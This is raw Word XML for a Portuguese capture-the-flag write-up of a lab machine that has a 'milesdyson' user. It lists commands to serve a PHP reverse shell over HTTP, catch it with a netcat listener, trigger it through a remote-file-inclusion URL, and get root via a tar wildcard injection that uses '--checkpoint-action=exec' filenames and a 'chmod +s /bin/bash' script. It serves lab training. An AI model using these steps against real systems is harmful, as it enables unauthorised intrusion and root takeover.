    <w:p w14:paraId="7A534BFB" w14:textId="77777777" w:rsidR="00DD1392" w:rsidRPr="003877C7" w:rsidRDefault="00DD1392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user flag?</w:t>
      </w:r>
      <w:r w:rsidR="00057666"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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6896D199" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRPr="003877C7" w:rsidRDefault="00150B1D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7CF3BD42" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRDefault="00150B1D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Lendo um pouco do exploit, você pode ver como utiliza-lo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB095A6" w14:textId="77777777" w:rsidR="00963711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Primeiro é preciso ter uma reverse shell baixada e edita-la </w:t>
      </w:r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(</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="006F73AC" w:rsidRPr="00664AA5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:spacing w:val="-1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="30"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://pentestmonkey.net/tools/web-shells/php-reverse-shell?ref=blog.tryhackme.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006F73AC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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69C0C4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Agora </w:t>
      </w:r>
      <w:r w:rsidR="00150B1D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é preciso criar um servidor local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usando python para poder baixar a shell dentro do servidor alvo.</w:t>
      </w:r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(Inicie dentro do diretório aonde esta a reverse shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761519A2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Também é necessário criar um netcat para poder ouvir quando a shell for executada . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2285546A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E então acessar o link: </w:t>
      </w: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>http://&lt;ip_target&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4878">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=</w:t>
      </w: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>http://&lt;ip_machine&gt;:8000/&lt;shell_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70042405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7B4878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r w:rsidRPr="007B4878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python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6D8E3" w14:textId="77777777"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7B4878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nc –lvnp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B6D15" w14:textId="77777777" w:rsidR="007B4878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34986DE" wp14:editId="56C7ACDE">
            <wp:extent cx="5068008" cy="68589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98B2" w14:textId="77777777" w:rsidR="007B4878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53F9FA8" wp14:editId="34DCD629">
            <wp:extent cx="3562847" cy="74305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A4E2" w14:textId="77777777" w:rsidR="00B60B06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710AC7A" wp14:editId="75B58608">
            <wp:extent cx="5400040" cy="98738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18C4" w14:textId="77777777" w:rsidR="00963711" w:rsidRDefault="00963711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E1EE68E" w14:textId="77777777" w:rsidR="00963711" w:rsidRDefault="00963711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Com uma simples navegação de diretório, é possível achar a primeira flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F96C5" w14:textId="77777777" w:rsidR="00D46938" w:rsidRDefault="00D46938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D46938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FE3C635" wp14:editId="7037CF45">
            <wp:extent cx="3391374" cy="15432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04D2" w14:textId="77777777" w:rsidR="006F73AC" w:rsidRDefault="006F73AC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4B6DAC81" w14:textId="77777777" w:rsidR="00DD1392" w:rsidRPr="003877C7" w:rsidRDefault="00DD1392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877C7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root flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497F9DE4" w14:textId="77777777" w:rsidR="006F73AC" w:rsidRDefault="006F73AC" w:rsidP="00DD1392">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dentro de </w:t>
      </w:r>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rStyle w:val="Forte"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/home/milesdyson/backups</w:t>
      </w:r>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, encontra-se um arquivo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rStyle w:val="Forte"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>backup.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Forte"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, e observa-se que um script está sen</w:t>
      </w:r>
      <w:r w:rsidR="00213468">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">do executado a cada minuto. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD9032D" w14:textId="77777777" w:rsidR="00213468" w:rsidRDefault="0021346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Rode estes </w:t>
      </w:r>
      <w:r w:rsidRPr="00213468">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>comandos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dentro do diretório /var/www/html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035BBCE7" w14:textId="77777777" w:rsidR="00213468" w:rsidRDefault="00213468" w:rsidP="00DD1392">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
      </w:pP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Comando usado: </w:t>
      </w:r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printf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'#!/bin/bash\nchmod +s /bin/bash'</w:t>
      </w:r>
      <w:r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 privesc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>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00213468">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w: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Comando usado: </w:t>
      </w:r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echo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""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"-</w:t>
      </w:r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-checkpoint-action=exec=sh privesc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.sh"</w:t>
      </w:r>
      <w:r w:rsidRPr="00213468">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w: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Comando usado:</w:t>
      </w:r>
      <w:r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echo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""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&gt;&gt; --checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A9E71" w14:textId="77777777" w:rsidR="00213468" w:rsidRDefault="006636FF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lastRenderedPageBreak/>
        <w:t>Entre no diretório do miles novamente e execute o comando sudo –su para poder ter acesso root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D3B8E" w14:textId="77777777" w:rsidR="006636FF" w:rsidRDefault="006636FF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6636FF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sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F27CA6" w14:textId="77777777" w:rsidR="006636FF" w:rsidRPr="006F73AC" w:rsidRDefault="006636FF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636FF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sudo su</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA49968" w14:textId="77777777" w:rsidR="00E95723" w:rsidRDefault="00E95723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E95723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817791D" wp14:editId="278E0881">
            <wp:extent cx="5400040" cy="376683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3852" w14:textId="77777777" w:rsidR="00E95723" w:rsidRDefault="00E95723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E95723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0EE914D5" wp14:editId="1ED0EC4C">
            <wp:extent cx="5400040" cy="345644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8046" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00D20060">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBCD924" w14:textId="77777777"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5" w:name="_heading=h.1t3h5sf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5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Conclusão</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E32081" w14:textId="6E6FC6DD" w:rsidR="00D20060" w:rsidRDefault="006636FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O CTF em si não é difícil, o que o torna um pouco mais chato é a escalação de privilégio dele, porém nada </w:t>
      </w:r>
      <w:r w:rsidR="0029230B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>impossível.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262DA52" w14:textId="77777777"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4d34og8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255E2D2B" w14:textId="77777777" w:rsidR="006F73AC" w:rsidRDefault="006F73AC" w:rsidP="006F73AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00664AA5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://pentestmonkey.net/tools/web-shells/php-reverse-shell?ref=blog.tryhackme.com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sectPr w:rsidR="006F73AC">
      <w:headerReference w:type="default" r:id="rId32"/>
      <w:footerReference w:type="default" r:id="rId33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074149" w14:textId="77777777" w:rsidR="00E525F2" w:rsidRDefault="00E525F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2DA32C7D" w14:textId="77777777" w:rsidR="00E525F2" w:rsidRDefault="00E52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218F88" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F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78618C" w14:textId="77777777" w:rsidR="00E525F2" w:rsidRDefault="00E525F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="443821AA" w14:textId="77777777" w:rsidR="00E525F2" w:rsidRDefault="00E525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5A496B" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F8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55DE41A" wp14:editId="2E04A066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28A32B7" wp14:editId="0AC838CD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4BF5402" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00D200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20060"/>
    <w:rsid w:val="00057666"/>
    <w:rsid w:val="000B6881"/>
    <w:rsid w:val="000D5DD4"/>
    <w:rsid w:val="000E2A5E"/>
    <w:rsid w:val="001220E1"/>
    <w:rsid w:val="00150B1D"/>
    <w:rsid w:val="001B1B77"/>
    <w:rsid w:val="00213468"/>
    <w:rsid w:val="0029230B"/>
    <w:rsid w:val="003877C7"/>
    <w:rsid w:val="003938D9"/>
    <w:rsid w:val="00611DAF"/>
    <w:rsid w:val="00625C40"/>
    <w:rsid w:val="006636FF"/>
    <w:rsid w:val="006A1456"/>
    <w:rsid w:val="006C795F"/>
    <w:rsid w:val="006E68C0"/>
    <w:rsid w:val="006F73AC"/>
    <w:rsid w:val="00703669"/>
    <w:rsid w:val="007338C6"/>
    <w:rsid w:val="00745D95"/>
    <w:rsid w:val="00780A57"/>
    <w:rsid w:val="007B4878"/>
    <w:rsid w:val="007D4C84"/>
    <w:rsid w:val="00963711"/>
    <w:rsid w:val="00AC45F8"/>
    <w:rsid w:val="00B1782E"/>
    <w:rsid w:val="00B60B06"/>
    <w:rsid w:val="00BF5AC8"/>
    <w:rsid w:val="00C539C9"/>
    <w:rsid w:val="00C80A73"/>
    <w:rsid w:val="00D20060"/>
    <w:rsid w:val="00D46938"/>
    <w:rsid w:val="00DC433B"/>
    <w:rsid w:val="00DD1392"/>
    <w:rsid w:val="00E505AC"/>
    <w:rsid w:val="00E525F2"/>
    <w:rsid w:val="00E95723"/>
    <w:rsid w:val="00EF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EDD44"/>
  <w15:docId w15:val="{0B79EEBD-5D33-49C1-B5A7-B236623E8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A5E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6A1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A1456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6F73AC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:rsid w:val="00213468"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:rsid w:val="00213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2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7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9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8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3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1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7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1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pentestmonkey.net/tools/web-shells/php-reverse-shell?ref=blog.tryhackme.com" TargetMode="External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pentestmonkey.net/tools/web-shells/php-reverse-shell?ref=blog.tryhackm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11</Pages>
  <Words>916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 COELHO ROCHA PINTO</dc:creator>
  <cp:lastModifiedBy>JOAO VITOR CHOUERI BRANCO</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-18T09:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-02T23:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>